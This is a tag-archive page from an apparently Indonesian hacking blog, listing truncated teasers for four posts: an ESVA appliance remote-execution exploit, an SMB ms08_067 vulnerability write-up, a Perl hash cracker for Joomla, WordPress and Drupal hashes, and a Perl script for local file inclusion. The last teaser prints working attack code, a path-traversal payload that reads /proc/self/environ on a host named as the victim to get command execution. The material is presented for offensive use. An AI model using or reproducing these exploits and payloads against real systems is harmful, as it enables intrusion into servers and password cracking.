Home / Tag Archives: usr bin

Tag Archives: usr bin

E-Mail Security Virtual Appliance (ESVA) Exploit.

black-hat-logo

# Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution. # Date: 10 Aug 2012 # Exploit Author: iJoo # Vendor Homepage: http://www.esvacommunity.com/ # Software Link: http://sourceforge.net/projects/esva-project/ # Version: < 2.0.6 ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, …

Read More »

SMB Scanning Vulnerability

win7hack

Terima Kasih BinusHacker telah memberikan kesempatan menulis disini dan ini adalah tulisan saya yang pertama kali di binushacker. Langsung saja, berdasarkan pengalaman saya, setelah install Windows XP, saya kira aman – aman saja dan ternyata di website resmi microsoft menyebutkan vulnerability pada netapi32.dll / ms08_067. Vulnerability ini ditemukan pada tahun …

Read More »

Multiple CMS Hash Cracker

Pantallazo

Good Day BinusHacker Family & Happy Ramadhan! Berikut ini adalah source untuk MD5/SHA-1 Cracker yang dibuat untuk Crack Content Management System Hash seperti Joomla, WordPress, Drupal, Dsb. Jadi bisa mempermudah pencarian hash, langsung aja deh 🙂 #!usr/bin/perl use Digest::MD5 qw(md5_hex); use Digest::SHA1 qw(sha1_hex); # Author: localh0t # Date: 09/06/11 # …

Read More »

LFI Remote Execute in PERL

black-hat-logo

Script berikut untuk menjalankan/mengeksekusi LFI proc/elft/environ secara simple di shell. #! /usr/bin/perl use LWP; use HTTP::Request; if (@ARGV < 1) { print "\n==========================================\n"; print " LFI Command Execution \n"; print "==========================================\n"; print "Usage: perl LFI.pl (without http:://)\n"; print "Ex. perl FLI.pl www.korban.com/index.php?page=\n"; exit; } $host=$ARGV[0]; $lfi = "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron"; print "Try …

Read More »